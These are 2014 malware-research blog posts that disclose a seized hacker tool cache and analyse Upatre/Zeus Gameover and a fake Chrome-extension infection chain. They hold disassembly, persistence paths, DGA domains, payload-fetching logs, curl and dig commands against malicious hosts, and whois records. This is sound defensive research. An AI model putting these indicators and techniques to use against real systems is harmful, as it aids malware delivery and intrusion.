Wednesday, April 9, 2014

When hacker got hacked - A disclosure & share of evil tools

The Background

With the thankfully good effort from our credited brothers, we MalwareMustDie, NPO (read: Malware Research Group & Anti Cyber Crime Workgroup) herewith disclose the existence of an evil service contains the full codes of malicious tools, in details: exploitation tools to distribute malware, hack tools, bruting tools, shell exploitation tools, spam bot tools, malware crypter, malware binary protector and binary packer, password cracking tools and its wordlists, some hacking and infection tools manuals and blackhat's howto picture and texts, that are mostly shared by the known hack group ANTICHAT.RU.The data or the contents itself is varied from 2011 and 2012 (mostly) with some new tools or manuals made in 2013.

What service?

The domain name owned and contains these data is (REDDACTED).XAKEP(.)BIZ (see the pictures snapped for the PoC) which the name explains more than words to all of us. For the law enforcement friends you will be sent email from our side contains the case's cyber crime investigation evidence which leading to the suspect ID of the site's owner. Noted the real domain name was a bit different (in purpose), is covered for law enforcement work purpose.

Please noted: Your direct access to the site is monitored by the related crook and there ARE accidents reported after accessing the site, that's why I announced the below warning:

The Shares

For security purpose the further data will be informed by mostly pictures and video as per following sections. We packed everything that we could fetch in a tarball as per snapshot in the picture below. This tarball is shared in very closed security industry ONLY via our colleague's mail list (please make sure you join the mail list, and I am sure you know what I mean if you follow our previous disclosures). So if you are in AntiVirus, Malware Filter, or Web/Proxy Attack Filtration (+IDS/IPS) industry's/entity's researchers and want to have the sample but not getting it yet, you can send request by writing comment below this post (it will be not published, explaining yourself and legit/non-free entity's email addresses will make the vetting process faster) and your request will be followed properly. The same goes to Government Security Agencies and Law Enforcements Agency's researchers.

The reason why we are limiting the shares is not for being "a picky" to whom to share the materials to, like we always do with the malware samples, but we just want to do the responsible and right sharing. This case is sensitive under below two points. (1) There is an active investigation on this case. (2) These are not malware samples to be sharable to be learned to crack/reverse/analyze to, but these are the real malware source codes, malicious tools and account hacking tools.. in ready to use form, shortly the real stealer tools! These tools are the subject against the law and order in many countries, even to just owning them can make yourself being jailed in my country. Some of these tools are still actively spotted in crime operation scene in the internet. Which means: IF these tools got leak or go to the irresponsible hands..this can be used for the VERY VERY BAD purpose and MalwareMustDie doesn't hold any responsibility or risk for it.
In some countries that we are actually living it is forbidden to pass around these kind of tools w/o strict permission to the appointed limited entities only. So we are sorry for the bummer to the researcher friends, we do want to share everything, but in this case we have to do it right. If you eager to have these materials, please kindly contact to your known security entity to contact us for you then we can discuss the legit possibility for the purpose.
Why did we post here and announce "the sharing" then? Because in reality there are many security legit entity which haven't seen these materials that actually being used by a cyber crime member, the knowledge and this awareness is a must share (to entities and to user level). We are trying to do that right here, with responsibility. So we assure you, we vetted the contacts, we monitor the download log strictly to make sure unnoticed party not to access, we don't share to unknown person and we deal with legit entity for sharing on this level to the widest reachable target in security community.

We are sorry if our share scheme is not satisfactory for some security researchers friends. For them, be free to send us comment in the below of this post with explaining the real identification then I am assuring you you will be assisted.
Thank you.

The Tarball:

Full Directory Structure

Noted: New released directories were wrapped in additional package, if you don't get it contact us.

The Pictures & Video of the Evil Contents

Various Exploit Kit's installer packages:

Web Shell in various scripts with or w/o CGI, below is PHP ones only:

Various tools of DDoS, Spammer & Bruter/Bombers:

Various Hack and Infection tools:

Various Malware Binary packers

Various Malware Binary Crypters and Protectors


Account hacking tools

DDoS/Blackhole Decoded

Botnet Installers & Source Codes

Common Proxy Tools used by Malware Crooks

And believe us, there are MANY MORE of those malicious tools than these pictures can show. The video (below) we recorded after collecting all of the content's data right before archiving will show more details:


This information is shared for the effort in suppressing cyber crime activities in the internet. We do not keep and own the malicious contents found, as experts we confirmed the information's credibility and as good citizens we follow with the share effort accordingly. Using this very precious information the filtration scheme can be applied better for the security and filtration products to protect innocent people from being abused by these malicious tool's users.

MalwareMustDie is working close and supporting to law enforcement agencies to deeper investigation upon mentioned threats. And we against any act that made our beloved internet becoming a junk places for malware, exploitations, extortion and stealing playground for cyber crime crooks.

We will continue to share important findings like this. Please support us.

Credit: Mr. Adam Ziaja of ComCERT, Poland.
Additional Credit: Mr. Mohab Ali of Synapse-Labs.
All materials checked and tarballed by @unixfreaxjp "as per it is" to support cyber crime investigation.

Stay safe always, friends. We have an uncivilized "jungle" claimed name of "internet" out there.


Thursday, April 3, 2014

Daily analysis note: "Upatre" is back to SSL?

Following the previous blog (link) of Zeus P2P Gameover (GMO) malware delivered by the Upatre trojan downloader from some encrypted form with varied file extension names. Today I found that the threat returned to previous model of Upatre downloader scheme (via SSL). Just in case I post it here, is not a new stuff, hope can help some friends:

The spam sample is like this:

*) The attached executable samples can be viewed at the bottom of this post.

The Upatre binary analysis

Some notes of the attached archived PE:

Compile Time: "0x533C67DB [Wed Apr 02 19:41:15 2014 UTC]"
Identified compiler : "Microsoft Visual C++ 5.0/6.0"
Entry Point at section: ".text"
CRC Fail: "Claimed 90984, Actual 77672"
Sigs: "Verified:Unsigned, Publisher: n/a"
Bad Entropy: ".text
              Entropy: 6.336388 (Min=0.0, Max=8.0)
              MD5: 28f4e63b3406fb9343aaf369f1897fb0"
I also use our beloved PeStudio downloaded from for the reliable alert's check:

Some suspicious/blacklisted calls used:

" GetStartupInfoW   .rdata: 0x000035D8,kernel32.dll
  GetModuleHandleW  .rdata: 0x000035C4,kernel32.dll
  _controlfp        .rdata: 0x000035B6,msvcrt.dll"

// Note about MSVCRT.DLL
is the Microsoft Visual C Run-Time Library (and MSVCPP.DLL is the standard C++ library)
 for Visual C++ version 4.2 to 6.0. It provides programs compiled with these versions o
 f Visual C++ a typical set of library functions required by C and C++ programs. These i
 nclude string manipulation, memory allocation, C-style input/output calls, etc. The msv
 crt.dll is now a "known DLL," meaning that it is a system component owned and built by 
 Windows. It is intended for future use only by system-level components.
So.. combined with the below's system's used "internals calls"... this "software" is likely never good..
"_wcmdln         .rdata: 0x0000351A,msvcrt.dll
__wgetmainargs   .rdata: 0x00003524,msvcrt.dll
_initterm        .rdata: 0x00003536,msvcrt.dll
__setusermatherr .rdata: 0x00003542,msvcrt.dll
_adjust_fdiv     .rdata: 0x00003556,msvcrt.dll
__p__commode     .rdata: 0x00003566,msvcrt.dll
__set_app_type   .rdata: 0x00003584,msvcrt.dll
_except_handler3 .rdata: 0x00003596,msvcrt.dll
_XcptFilter      .rdata: 0x00003504,msvcrt.dll
__p__fmode       .rdata: 0x00003576,msvcrt.dll" 
...But yet, some known software made by Microsoft Visual C also having the traces of them, hmm..I'll stick to "suspicious" then :

The Upatre binary contains encrypted (or obfuscated?) data in here:

.text:00401870   dd 498D10h, 0F1708305h, 0FF8B04h, 0AC7FF60h, 8D0004E8h
.text:00401870   dd 45C150CCh, 8BFFFF8Dh, 0F811082h, 4242483h, 6F006300h
.text:00401870   dd 8B01E8FFh, 40420D4h, 8D00248Bh, 0F8107D83h, 3300E8FFh
.text:00401870   dd 0F8037E01h, 48B24E8h, 2025A09h, 8B018D8Dh, 412C00h
.text:00401870   dd 0FFFF33FFh, 0DC188261h, 12401FFh, 0A00C0408h, 8BFF0104h
.text:00401870   dd 700C150Dh, 1FF2400h, 0F4F022DBh, 8B000133h, 0E17300E1h
.text:00401870   dd 2 dup(1F001Fh), 0FF00001Fh, 324B32h, 13E08D00h, 0FF1F001Fh
.text:00401870   dd 2 dup(1F001Fh), 0
.text:00401C54   dd 68014816h, 3 dup(1F001F00h), 0FF1F001Fh, 0F06492h, 2 dup(1F001Fh)
.text:00401C54   dd 0FF001Fh, 1F1FFF00h, 4026F155h, 2 dup(1F001F00h), 0A201A241h
.text:00401C54   dd 1F001Fh, 6E614865h, 1F00FF00h, 1FFFh, 2 dup(1F001F00h)
.text:00401C54   dd 0E815701h, 1C001014h, 4081804h, 100008h, 18080404h
.text:00401C54   dd 0C900F8h, 0D400EAh, 0ED00E0h, 0D000C9h, 0AA0095h, 890076h
.text:00401C54   dd 6C0093h, 83007Ch, 8F0070h, 0D100EEh, 94002Bh, 0C600F9h
.text:00401C54   dd 60079h
.text:0040229C   db 0C0h, 0  // closing chunk.
Note: I tend to call it encrypted since it needs a XOR key to decrypt it, see the following notes. Note: There are some more obfuscated data in other places too (in .data, .rdata, and .rsrc), this binary is literally encrypted.

If we solve the above obfuscation (which I can not) it should give codes for method to decrypt the encrypted traffic, downloads malware from assigned hosts. If you don't have disassembly you can use the raw disassembler result from IDA free version I pasted here--> (link) to start the reversing process.

Another note: the "start" point is in .text section, it checks environment there (plus few evasion tricks) and go to wWinMain which contains the real deal of decrypting the obfuscated data. In the wWinMain I can see a below interesting checking pattern after XOR:

"deobfuscation pattern, repeated more than one..
 (three times actually with different used registers")
push    edi
pop     edx
mov     eax, [ebp+var_60]
rol     eax, 6
add     eax, 455E4A5h
mov     [ebp+var_3C], eax
mov     edx, 136C6E9Bh
mov     [ebp+var_1C], edx
mov     ecx, 7E0C0B9Ah
mov     [ebp+var_68], ecx
mov     eax, 668758F1h
mov     [ebp+var_14], eax
mov     edx, 5D1E4FCDh
mov     [ebp+var_18], edx
mov     ecx, 0FFFFFFFFh
mov     [ebp+var_C], ecx
call    sub_4015A0  [...]    <=== "xor'ed and checked"

"called checks to sub_4015A0: "
push    ebx
push    esi
push    edi
mov     ebx, [ebp-80h]
xor     ebx, 0ABED8791h  <======
mov     edx, 40000000h
ror     edx, 0Eh
cmp     ebx, edx   // the checks.
jb      sub_401464 // end stuff here...

How does it work?

This is what I saw. The Upatre during execution is communicating to below host:

kionic,com / 64,92,125,121 (Netfronts/U.S.A.)

via TLSv1 (SSL):

which fetching the microsoft certification patch's URL and Comodo's encryption certification's URL:

Next, these data will trigger each URL in the list to be downloaded by the Upatre itself as per shown below:

Some reference for you of the explanation what was downloaded from the microsoft site:

Is a patch to revoke certification, was intended to make sure the following Comodo certification can be installed successfully:

This is the one that can be downloaded successfully:

Next.. Upatre downloads a binary blob via an encrypted communication (SSL) from (

To be more viewable:

The downloaded malware is to be saved and registered (autorun) in:

// drops:
C:\Documents and Settings\%USER%\Local Settings\Temp\Ixtya (RANDOM)
2004/08/08  12:58  646,656 dyzucy.exe (random) 0929a17a3fbaf6b1eb63ab8d5edbdd45

// registry..
Key: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Data: "dyzucy.exe" (RANDOM), Values: "C:\Documents and Settings\kaspersky\Local Settings\Temp\Ixtya (RANDOM)\dyzucy.exe(RANDOM)"
it is Zeus P2P Gameover (GMO) with rootkit version. Upatre execute this GMO and self deleting itself. Clean cut.

Spawned malicious processes is like this:

Invoice_040314.scr (PID: 3860 MD5: C941E2997DC2A1E39515D226E1830DB4)
    tech3.exe (PID: 1192 MD5: 984A0B8A58EA60B3376CE25692B68FA8)
        tech3i.exe (PID: 3672 MD5: 5038C8E8D2B9A00327D0CBF334223E9D)
            dyzucy.exe (PID: 1404 MD5: C7BD551912375FA2312629E070AC51F2)
                1aaa970c.sys (PID: 4 MD5: BA2B9FFB336BF5AF0247313FE2509435)
            cmd.exe (PID: 4076 cmdline: C:\Windows\system32\cmd.exe /c %Temp%\XNY9C82.bat MD5: AD7B9C14083B52BC532FBA5948342B98)

The Gameover

Not much to tell (kudos good people who fight this threat well!), instead is an usual installation (the batch), and drops its rootkit & hooked itself in registry, after a while it starts querying some DGA as below:

aulbbiwslxpvvphxnjij,biz                                      /
behatwdxzxelembmfahkw,biz                                     /
..and as usual it sent a POST /write HTTP/1.1 (I don't go to details on these, cheers!):

Are they really changed?

Samples, Traffic and VT

Below is the sample's snapshots:

Please download via Kernel Mode-->(link)

Matrix of stages infection's detection ratio (VT)

This time I would like to make a matrix of the detection ratio of the malware by the time I analyze this sample. I used the VirusTotal (VT) scores for the comprehensive result purpose. Please be noted that VT score is based on part of signature (not overall filtration and) detection used by AntiVirus industry, so it is just not an exact measurement, but is good enough to give the idea of how is the detection on this threat by AV industry in every form of samples (during infection stages) on this infection.

The "Stages" column explained the form of the malware during the infection process as the object to be scanned by AV products. I started from the stage 1 as the email data itself, goes to the attachment in zip, PE, PE self copied after being clicked, the downloaded GMO, self-copied GMO and rootkit downloaded/used. Feel free to comment for improvement:

Stages Malware Virus Total Score
1 EML Spam file 15/51
2 Upatre SCR in attached zip 21/51
3 Upatre fake SCR the PE file 20/51
4 Upatre Self-Copied after clicked 14/51
5 Downloaded Zeus GMO 17/51
6 Self-Copy Zeus GMO after downloaded 13/51
7 Rootkit (Necurs) 15/51

So in overall we have an average score 16.42/51 or 32.21% detection ratio for this malvertisement, not so bad :-)

Video Analysis Tips and Guide

I made & upload an HD Video as a quick way of howto analyze this threat (Upatre/GameOver sets) as per seen below. I use the different set of sample and is not describing the specific sample mentioned in this or previous post, but same threat and case:

Stay safe friends. #MalwareMustDie!

Saturday, March 22, 2014

A post to sting Zeus P2P/Gameover crooks :))

The Background

This end of week, Zeus P2P Gameover (in short: GMO) is having a large campaign by utilizing Upatre (with using latest version to download encrypted ZZP file w/many extensions) which are riding the Cutwails spambots (I checked those by IP and templates). As so many good writings and coverage stated out there, these recent GMO is having a new trend to use Necurs Rootkit, sending new callback (with POST /write) HTTP header to the CNC, dropping themself (GMO payloads) with the polymorphic hashes to evade detection, thus tons of randomized DGA to fire P2P callbacks for the botnet functionality purpose (the last one is apparently not new).

Shotly, this new "trend" with the large volume of campaign brought my interest, so I started to collect what came up to my honeypot from March 18, 2014 until today as the background of this post.

The Quick Research

Below is the pictures of the malvertisement that the crook was kindly sent me personally:

And the below is the list of analysis I did in Virus Total, see the comment of each post for the details:
d866214d1f921028f9001ae399e9f8dec32ec8998c84d20d60a992164888a6fc 37a835b0ac6d9727bf881743a90e3a8684ca53fdf485645ce07617ec1a203067 947470a114311049e707dfefce904fa727c8170eae8c46165730c699e7636b5f 4514fc971127fb0a38a7eb6ce45ce44a68b1b3298ff98d5dd6e4f9bd2af0b1ac abf2a63b0b02979d79edd4563f784c7c375eb0cb3ef4dc12ccba2612d07a9dc2 e49c5883dfe16916a262f54013735d20fec64ecaf5d6f598c4493f4f68fb9199 e5270d906ef13a91e176cf60473747e5bf91bc60fe457dd0f3201a5f51cf6524 5593370060e811aeacbb09161b9d8ebbf4251286f821503dbede0993f248d13c a7739611b998ed82e060d4297d38f8f0792f4866c54575ba5ba6f2b454246f07 e85446688c08dd62bb17a21255fe486eb2fb8ca4acc2e4ae974e31a4ad9dfbe0

There are many interesting details about this threat, like VRT (link) and CERT Polska (link), which are very good reports! Since I am dead busy right now, so please kindly bear with this short post, and I won't wrote much of etc technical details covered in previous reports by others. SO I want to stress here is only one aspect: the DGA callback domains used by GMO (as per below picture) which wasn't covered much in prev. articles, but it is important to understand and learned since the DGA used by GMO is having their weak points to be used stop or mitigate the threat, and giving the bad actor behind the scene a "sting" :))

What's with these "Lame" DGA?

By skipping the details of reversing binaries for security purpose and and comparing the result in the forensics, I collected these callbacks as per below list of domains:


"// Additional:"

"// Additional:"

"// Aditional:"

"// Additional:"
These are the "Lame DGA" that GMO uses, means these are strings that are being decoded in the malware binary and without seeds, a wannabe DGA (Domain Generation Algorithm) which is not randomized and the logic of extracting each strings is in the GMO binary itself for the listed samples I stated above. One doesn't have to be a reverser to figure some of these "Lame DGA" domains are used & spotted over and over in many samples. So why so many domains made, and "looks" to be randomized in name? "Maybe" they (as of GMO crooks) want us to think as DGA to avoid blocking actually. It is an insult to decent people's intelligent and will be a massive big #FAIL for the crooks itself if people starting to aim cannon for this weak spot (yes, friends, aim your cannon there, THERE!).

What? Blocking? Is it blockable? Not a decoy or something? Are these really activated? < Answer of all these generally are "YES!", and also could be a decoy too (if they're not going to activate these domains anyway). Great, isn't it? :D

Activation, IP Information & Getting Closer to CNC??

As the PoC: Now (TODAY to be precised) I found four of the domains above is actually activated and ALIVE:

aulbbiwslxpvvphxnjij,biz,           "50,116,4,71     DNS1-5,REGISTRAR-SERVERS,COM"
peucehqxsgmzhgujfsoeihmpvhiz,info,  "212,71,235,232  NS1-4, MONIKERDNS,NET"
tcvkwsbqnjhjobgyttklnfxo,com,       "23,239,140,156  NS1-4,MONIKERDNS,NET"
zxjzaypibnjayfmpzpalkbaunzl,com,    "178,79,178,243  DNS1-2,NAMESECURE,COM"


With the details information below:

Yes, LINODE is having a serious matter with Zeus/Gameover, because all of these IP addresses are GMO's control and centre front ends :-))

These 4 (four) and just added one new (will add more) IP addresses, which are also not ISDN/pool IP, but a static IP, and two of them are in the status of Corporate ones. So if you think that these four IPs are the peer-tp-peer's or infected PC's IP, the answer is no, and please start to deduct the further investigation step on why GMO is collaborating these IPs.

ADDED: Cut the crap! What's the connection of the DGA to CNC??

I was asked many questions about what's this DGA actually does. I will try to write simple explanation as per follows, sorry to my fellow researchers to burp this fact here, because "some people" are starting to think that I am trying to sell "candy bar" here..

Gameover is rapidly requested DNS for the active IP address of CNC by using this DGA, "WITH OR WITHOUT internet connection" (since I heard a noise said to prevent internet connection to make GMO querying lots of domain..which is just WRONG).
Even the connection of internet exists, GMO will request the rapid calls as per screenshot PCAP above (see below for re-post)

The purpose is to confuse researchers and they are aiming only one (or max: two) IP address(es) of CNC that actually being registered under "few" of "tons" of lame DGA domains. To be more clear, take a look of the PoC below:

As the PoC look at the latest sample's DGA, we detected the activation of the IP address below:

Receiving the IP address from the DGA requested, then GMO can send request to the CNC as per below PoC in real:

This is the connection, and how the DGA is actually very important for Gameover communication to the CNC, blocking these DGA will block its communication to CNC, and without CNC connection GameOver is just "another" bonnet without master's command and control and will work on peer to peering each other without any control from the herder < this is the connection you all asked for, this is the attack point. (Forgive me the God if InfoSec to burp this info out in public here, there is no way I can convince others without telling this fact loud and clear..)

What's the point??

Below are my points, I make it as simple as possible:

1. Get these DGA domain registration info! These DGA is registered only by the bad actor, is not hacked sites, is not a hacked domains. We have tons of experience now for nailing crook's ID by this method, so please extract the information from your known registrars and please passed to law enforcement immediately.

2. A suggestion; Chance to catch "in the act". The unregistered domains will likely to be registered sooner or later after the current ones are blocked/suspended, so it is a good for registrars, CERT and law enforcement to make an extra effort: A list, or better yet, an Auto Block Scheme and maybe a Direct Alert System to be sent to law enforcement to trap the crook's collaborated channels to be "caught in the act" to be legally investigate.

3. Do it NOW. GMO coders is implementing the logic of the DGA in the GMO binary which are stuff that is not easily remake, unless redeveloping big part of the current malware, so we can hope this scheme lasts for a while, so it is a chance for good guys! :-))

4. Words for the "malware crooks": I really love to see malware "crooks's" faces while they're reading this post :P) A few words for the malware coders from us; We are security engineers here, we reverse stuffs very good, we investigate things deep, don't make us coming at you now, STOP your coding malware practise and get the decent work like all of us. Life, no matter what, is never easy, let's code something useful & positive even we only receive few pennies for it.


Additional & Follow up

Mr. Conrad Longmore was extracting more related DGA via verdicted IP addresses above, thank's Conrad so we don't have to crack binary per binary to get these. Please visit Dynamoo Blog in the link below:


What we are posting here is the knowledge for awareness of many PC users, the victims who are getting many hits by this malware's infection, whose credentials were stolen in some botnets panel by these GMO's affiliated gates/panels, to inform you that actually there are so many methodology that can be applied and executed to stop the malware infection scheme that is coming from/using internet. As long as the good guys are still in control in the networking and internet, the scheme to stop malware infection via malvertisement can always be applied.
The only problem is always: HOW BAD we REALLY want to stop these malware?


Monday, February 24, 2014

Tango Down: The takedown of 209,306 .IN.NET Nuclear Pack DGA domains

This post is the tribute to the hard working invidivuals and professionals who made the impossible happened.

The Report

As one of the result of a persistent collaboration between security researchers and domain registration process. Following the previous suspension effort of Nuclear Pack Exploit Kit domains (link). On behalf of individuals & professionals involved in the process, we dare to announced the suspension process of 209,306 Nuclear Pack domains on TLD: ".IN.NET". Is the biggest Tango Down score in the history of MalwareMustDie.

For the security purpose we can not say much details about this matter yet, except that all of the domains are positively "verdicted" for its involvement in the DGA scheme of the malicious infection toolkit, and are positively confirmed to their preliminary registration investigation suspicious facts beforehand. The bad actor(s) is preparing these domains to serve malware, and the usage of these domains are blocked with the currently spotted active domains are all suspended.

We announced the tango news here to signal the law enforcement and authority to start investigating the listed suspended domains, that contains the data which can be used as cyber crime evidence on malware infection effort through software exploitation by abusing mass .IN.NET internet domains.

The full list of the DGA domains used and the checking report is very long that we can not paste them all here in the post or pastes (yet), but this is the link of the extracted DGA domains -->[here] < Thank you @jedisct1 and Gist!

Good Work Credit

Special thank's for the great cooperation from DOMAINS.IN.NET Team, what a speedy and solid work! It is a very long list but you checked it instantly following to the swift suspension.
The special credit goes to our friend Mr. Frank Denis of OpenDNS for the DGA decoding and its report, our Tango Department leads by Mr. Sachin Raste of eScan, side by side with Mr. Conrad Longmore, Mr. Dhia Mahjoub of OpenDNS and other managers from varied entities that we can not mention you all here, who are actually silently fighting this threat in a tough daily routine, Salud!

The process is not stopping in here. There will be more follow up.

Tweets & Comments


Sunday, February 23, 2014

How public services like Amazon AWS, DropBox, Google Project/Code & Google ShortURL got abused to infect malware

Today, I almost went to bed when bumping into this threat. Please kindly bear the sleepy eyes on writing these. I am combining the screenshot and log/details in texts, hopefully there will be no filtration product would block this post for a bit of URL's paste.

This writing contains many points that are important information for fellow friends and the mentioned public services to be aware of being abused by this malware infection session. So I wrote this as fast as possible and leaving payload binary analysis and exploit analysis in a rain check. To anyone who can help to contact the related abuse, is very highly appreciated.

Infection Source:

First of all. The source of infection is the malware infection code/scripts that was implemented in the below IP and domain, located in OVH network, in France, I really hope to have help from France friends to clean this IP from any malware infector toolkits installed:

Secondly, the infector, is starting from Japan's IP under domain: shortening .biz

This needs to be cleaned up too, yet I think there are more infectors exist..

The background

It started when checking a suspicious URL, accessed it in the browser as per below:

I regenerated with the separate scheme to record the below log (for the source of infection details purpose), just to make sure that we had everything in our hands:

--2014-02-24 02:40:02--  h00p://shortening .biz/qnwr
Caching =>
Connecting to||:80... connected.
GET /qnwr HTTP/1.1
HTTP request sent, awaiting response... 
HTTP/1.1 301 Moved Permanently
Date: Sun, 23 Feb 2014 17:40:03 GMT
Server: Apache/1.3.42 (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8e
Keep-Alive: timeout=5, max=19
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
301 Moved Permanently
Registered socket 4 for persistent reuse.
Location: [following]
Skipping 302 bytes of body: [
301 Moved Permanently
Moved Permanently
The document has moved (A HREF="h00p://shortening .biz/qnwr/")here(/A)
Apache/1.3.42 Server at Port 80
] done.
--2014-02-24 02:40:03--  h00p://shortening .biz/qnwr/
GET /qnwr/ HTTP/1.1
HTTP/1.1 200 OK
Date: Sun, 23 Feb 2014 17:40:03 GMT
Server: Apache/1.3.42 (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8e
Last-Modified: Thu, 23 Jan 2014 14:54:18 GMT
ETag: "1135-52e12d1a"
Accept-Ranges: bytes
Content-Length: 4405
Keep-Alive: timeout=5, max=19
Connection: Keep-Alive
Content-Type: text/html
200 OK
Length: 4405 (4.3K) [text/html]
Saving to: ‘sample.mmd’
100%[=======================================================>] 4,405       --.-K/s   in 0.009s  
2014-02-24 02:40:03 (459 KB/s) - ‘sample.mmd’ saved [4405/4405]
Back to the browser, in the short while the browser's address bar flickering to the redirection URL as per below:

And this act is confirmed by the series of the html tag meta refresh code grepped below:

What happened next? I was being forwarded into a page with video of "a lady in the bed" as per captured below:

I just about to praise on how fortunate I am.. but the video soon got stopped and the warning message came up with popping the download of the Flash Player Setup.. as per shown below:

The Path to Payload

Back to the shell, I simulated the download page for evidence:

And that was giving me the below script actually:

And now we know why I got that redirection, the (the very bottom link) is serving the infection landing page and I was redirected into it. Will explain this later on. And there are other conditions for another redirection, for the mobile access and Opera browser in the GOO.GL short URL. Anyway if we extract those Short URL for Mobile and Opera browser we'll find the better image:

(I will have to leave other friends to check those two links deeper..)
The further research in the blacklisted URL found the below Amazon AWS abused account (sorted by history) by the same threat:

And this is the malware file downloaded if you are matching to the desired condition:

Now this payload is well detected by AV industry as per shown in VirusTotal result here-->>[link]
If you run the payload you will get the query and response in HTTP as follows:

And this payload is downloading a "config" with the info on hash and URL of another malware, as per shown here:

Here's that "guncel.exe" malware download session in my shell..a simple wget will do..This could be the updates or sort of.

This is the VirusTotal report of the "guncel.exe", is the same file as original payload, it is also as an evidence explaining that the origin of the payload is (>>[link], the detection rates as the VBA basis Trojan Downloader is not so bad after all, good work.

Below is interesting trace of what this malware did in the memory:

This is just some traces of VBA calls used..(during the creation of registry key)

Quick analysis that might help fellow researchers and infected victims:

The payload will download the background.js JavaScript w/URL planted in the binary, as per traffic below:

Which is having the script as I pasted here-->>[link]
↑You can see clearly the malicious traffic redirection scheme and access URL to the landing page (origin of the infection), in that script..

The next traffic will explain how this background.js is called, the file manifest.json was downloaded, it contains the script to show how background.js is executed by setting several security privileges for the execution of the script itself..

You can see the effort to fake "Google Shockwave Player" (any such product??) upon the execution of background.js above? Things are starting to make much sense on why so many Google related "images" are used here.

PS: I will add some more reversing notes later on, but shall we move on a bit..too little time..for there are more important parts to cover..

What happened if we simulate the landing page access in shell is something like this:

GET /s/pwuh8wdutwot4dg/rezillik.html HTTP/1.1
HTTP/1.1 200 OK
accept-ranges: bytes
cache-control: max-age=0
Content-Type: text/html; charset=utf-8
Date: Sun, 23 Feb 2014 21:01:55 GMT
etag: 2n
pragma: public
Server: nginx
x-dropbox-request-id: ecd60af812734360278c876a87176a00
X-RequestId: 6f612d52e7e3c0e526aa4b355328e047
x-server-response-time: 202
Content-Length: 6841
Connection: keep-alive
---response end---
200 OK
Registered socket 4 for persistent reuse.
Length: 6841 (6.7K) [text/html]
Saving to: ‘sample4.mmd’
How I got the payload being downloaded then?? Let's see the code inside the page. Well..It seems like I got hit by the timer function stated by this code:

The Google short URL is again being used to hide the real malware payload URL which is served in the Google Code SVN download!!

The download log can be seen in the follow up section..

Well..the bad guy behind this is really trying hard to convince victim about the Google kind of application is installed :-)

Some reversing & investigation notes

I used recent sample in an abused Google Code SVN here:

The sample is in VT here-->[link]

Straight to the point: A reversing effort showing the CNC masked in binary strings:

The User Name :-))

Maybe we'll need these later, just in case, noted:

"key": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRD

Next. Following the trails of that CnC URL, to find the junk used:

Now we can see the code clearly, instead of the PCAP data :-D
See the dates well, the crook was recently modifying the background.js malicious script.
It has the background.js and manifest.json code snipped below:

As per explained way up above, the JSON is used for execution of background.js. We didn't have a a chance to disclose background.js clearly before, so this is it, a fresh one. First, the beautified full code of the bakcground.js is:

If you see what I see, the attacker is aiming Google Chrome browser, by abusing its API (chrome.tabs) to interact with the browser's tab system. You can use this API to create, modify, and rearrange tabs in the browser. Anyway, what he did is on "devtools://" index/tab, he programmed to execute remote script via chrome.tabs.executeScript command to www.saatlikrapor .com/ext/s.php, which this was BAD (gone now-->link and link) in . Either this crook loves Google so much or hates Google that much.. since now we know he is aiming Google chrome browser's end user too.

PS: The domain is hidden behind cloudfare:

;          IN      A

;; ANSWER SECTION:   300     IN      CNAME       300     IN      A       300     IN      A

;; AUTHORITY SECTION:       3600    IN      NS      ""       3600    IN      NS      ""

;; ADDITIONAL SECTION: 384     IN      A 371     IN      A
This is the domain information, a shiny brand new one:
   Registrar: DOMAINSITE, INC.
   Whois Server:
   Referral URL:
   Status: clientTransferProhibited
   Updated Date: 25-feb-2014
   Creation Date: 25-feb-2014
   Expiration Date: 25-feb-2015

Registrar: DomainSite, Inc.
Registrar IANA ID: 466
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone: +1.17202492374
Domain Status: addPeriod
Domain Status: clientTransferProhibited
Registrant Name: Whois Agent
Registrant Organization: Whois Privacy Protection Service, Inc.
And how about the CnC used? ; SAME pattern! :-) behind cloudflare..
;       IN      A

;; ANSWER SECTION: 300    IN      A 300    IN      A

;; AUTHORITY SECTION: 3600   IN      NS      "" 3600   IN      NS      ""

;; ADDITIONAL SECTION: 3462    IN      A 3483    IN      A
And under below registration details:
   Whois Server:
   Referral URL:
   Status: ok
   Updated Date: 12-jan-2014
   Creation Date: 07-jun-2013
   Expiration Date: 07-jun-2014
We will have to deal with the Turkish law enforcement to nail this guy for good:
CREATE DATE: 6/7/2013 11:59:57 AM
UPDATED DATE: 1/12/2014 3:25:26 PM
EXPIRATION DATE: 6/7/2014 11:59:57 AM

owner-organization:Whois Privacy Protection Service.
No, no, it is NOT a hacking site: (Pls don't give me that preach..)
$ curl
$ curl
$ date
Fri Feb 28 10:10:36 JST 2014


The domain of WJETPHP.COM which was informed in the top section as the "payload center" (red: CNC) also still alive now with the below details:

$ dig WJETPHP.COM any

; <<>> DiG 9.8.5-P1 <<>> WJETPHP.COM any
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 542
;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 0


WJETPHP.COM.  21599 IN NS "mary.ns.cloudflare.COM."
WJETPHP.COM.  21599 IN NS "todd.ns.cloudflare.COM."
WJETPHP.COM.  21599 IN SOA mary.ns.cloudflare.COM. dns.cloudflare.COM. 2014501676 10000 2400 604800 3600

;; Query time: 277 msec
;; WHEN: Sun Mar 09 04:12:37 JST 2014
;; MSG SIZE  rcvd: 137
As you see, he is still hiding his service behind the cloud flare until now (read: cloud flare's customer).

Moreover, the ownership of the domains:

Domain Name: WJETPHP.COM
Registrar: FBS INC.
Whois Server:
Referral URL:
Status: clientTransferProhibited
Updated Date: 01-feb-2014
Creation Date: 24-may-2013
Expiration Date: 24-may-2014
>>> Last update of whois database: Sat, 08 Mar 2014 19:17:39 UTC <<<

Domain Name: WJETPHP.COM
Registry Domain ID:
Registrar WHOIS Server:
Registrar URL:
Updated Date: 24-Jul-2013
Creation Date: 24-May-2013
Registrar Registration Expiration Date: 24-May-2014
